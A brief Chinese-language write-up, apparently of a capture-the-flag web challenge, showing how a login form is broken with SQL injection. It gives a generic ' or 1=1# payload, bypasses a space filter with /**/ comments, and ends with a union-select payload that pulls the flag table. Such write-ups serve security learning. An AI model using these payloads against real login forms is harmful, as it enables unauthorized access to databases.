看到是一个登录框,所以先考虑到是sql注入。
使用通用payload进行测试
username=a' or 1=1#&password=a
发现这里出现了 sql inject error
然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题
那么我们可以选择使用/**/代替空格
然后就是正常流程
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a
以上